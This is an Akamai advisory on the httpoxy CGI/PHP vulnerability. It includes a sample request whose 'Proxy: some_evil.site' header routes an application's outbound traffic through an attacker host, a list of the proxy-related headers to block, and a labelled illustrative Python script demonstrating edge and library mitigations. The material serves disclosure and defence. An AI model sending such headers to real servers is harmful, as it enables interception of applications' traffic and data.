
Akamai Mitigates httpoxy Vulnerability

Dominic Scheirlinck and the httpoxy disclosure team disclosed a vulnerability on Monday, July 18th, 2016 that affects many PHP and CGI web applications.

Many origin web applications (particularly PHP and CGI applications), or more precisely the HTTP client libraries they use, trust the "HTTP_PROXY" environment variable as the outbound proxy setting when generating forward requests. The CGI specification (RFC 3875, which PHP also follows) requires the web server to expose every incoming request header to the application as an environment variable before the CGI program runs: the header name is upper-cased, hyphens are replaced with underscores, and "HTTP_" is prepended. Because that mapping is applied to any header the client chooses to send, an attacker can set the "HTTP_PROXY" environment variable for a vulnerable application simply by sending a "Proxy" HTTP request header, and every outbound HTTP request the application makes while handling that request is then routed through a proxy of the attacker's choosing.

This sample request will cause "vulnerable_app.cgi" to use "some_evil.site" as a proxy for any HTTP requests that it issues while handling the request (header names are case-insensitive, so "Proxy", "PROXY" and "proxy" all become HTTP_PROXY):

      GET /cgi-bin/vulnerable_app.cgi HTTP/1.1
      Host: destination_domain.site
      Proxy: some_evil.site

Potentially affected environment variables, with the request header that sets each one:

      HTTP_PROXY            Proxy
      HTTP_PROXY_PASS       Proxy-Pass
      HTTP_PROXY_USER       Proxy-User
      HTTP_PROXY_HOST       Proxy-Host
      HTTP_PROXY_PORT       Proxy-Port
      HTTP_PROXY_PASSWORD   Proxy-Password
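The following script is an added illustration, not code from this post, from Akamai or from any real web server: it performs the RFC 3875 header-to-meta-variable conversion on the sample request above, shows a naive client picking up the attacker's proxy from HTTP_PROXY, and then applies the two mitigations in play here, dropping the offending request headers before conversion (what an edge or web server does) and ignoring the upper-case HTTP_PROXY whenever REQUEST_METHOD indicates a CGI context (the library-side fix recommended at httpoxy.org). The raw request, the header list and the function names are constructed for this example.

```python
"""httpoxy in miniature: how a client-supplied "Proxy:" header becomes the
HTTP_PROXY environment variable under CGI, and two ways to break the chain.

Constructed example; not Akamai's code or any real web server's.
"""

from typing import Dict, List, Optional, Tuple

Header = Tuple[str, str]

# The request shown in the post, as a raw HTTP/1.1 message (constructed).
SAMPLE_REQUEST = (
    "GET /cgi-bin/vulnerable_app.cgi HTTP/1.1\r\n"
    "Host: destination_domain.site\r\n"
    "Proxy: some_evil.site\r\n"
    "\r\n"
)

# Request headers whose CGI meta-variables are the ones listed in the post.
HTTPOXY_HEADERS = {
    "proxy", "proxy-pass", "proxy-user", "proxy-host", "proxy-port", "proxy-password",
}


def parse_request(raw: str) -> Tuple[str, List[Header]]:
    """Split a raw HTTP/1.1 request into its method and an ordered header list."""
    head, _, _body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method = request_line.split(" ", 1)[0]
    headers: List[Header] = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return method, headers


def cgi_environment(method: str, headers: List[Header]) -> Dict[str, str]:
    """Build the meta-variables a CGI server hands to a script (RFC 3875 section 4.1.18):
    each request header becomes HTTP_ + NAME, upper-cased, with '-' mapped to '_'.
    Repeated headers are joined into one value, as the spec requires."""
    env = {"REQUEST_METHOD": method}
    for name, value in headers:
        meta = "HTTP_" + name.upper().replace("-", "_")
        env[meta] = env[meta] + ", " + value if meta in env else value
    return env


def naive_outbound_proxy(env: Dict[str, str]) -> Optional[str]:
    """What a vulnerable HTTP client library does: honour HTTP_PROXY wherever it came from."""
    return env.get("HTTP_PROXY") or env.get("http_proxy")


def cgi_aware_outbound_proxy(env: Dict[str, str]) -> Optional[str]:
    """Library-side fix: REQUEST_METHOD is only set under CGI, and there the upper-case
    HTTP_PROXY may be attacker-controlled, so it is ignored. The lower-case http_proxy
    can never be produced by the header mapping (names are always upper-cased), so a
    legitimate operator-configured proxy still works."""
    if "REQUEST_METHOD" in env:
        return env.get("http_proxy")
    return env.get("HTTP_PROXY") or env.get("http_proxy")


def strip_httpoxy_headers(headers: List[Header]) -> List[Header]:
    """Server/edge-side fix: drop the dangerous request headers before conversion."""
    return [(n, v) for n, v in headers if n.lower() not in HTTPOXY_HEADERS]


def demo() -> Dict[str, Optional[str]]:
    """Run the sample request through the vulnerable path and both mitigations."""
    method, headers = parse_request(SAMPLE_REQUEST)
    vulnerable_env = cgi_environment(method, headers)
    stripped_env = cgi_environment(method, strip_httpoxy_headers(headers))
    return {
        "vulnerable": naive_outbound_proxy(vulnerable_env),        # some_evil.site
        "library_fixed": cgi_aware_outbound_proxy(vulnerable_env), # None
        "edge_fixed": naive_outbound_proxy(stripped_env),          # None
    }


if __name__ == "__main__":
    for name, proxy in demo().items():
        print(f"{name:>14}: {proxy!r}")
```

Either mitigation alone closes the hole for this request; blocking the headers at the edge or web server protects applications you cannot patch, while the REQUEST_METHOD check is what an HTTP client library can do without knowing how it was deployed.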

What should you do if you own a vulnerable website?

Akamai has moved to protect the vast majority of its customers by blocking, at the edge, the HTTP request headers that would set these variables in a CGI/PHP environment.

We highly recommend that, even if you are an Akamai customer, you protect your application servers immediately, as described at httpoxy.org.
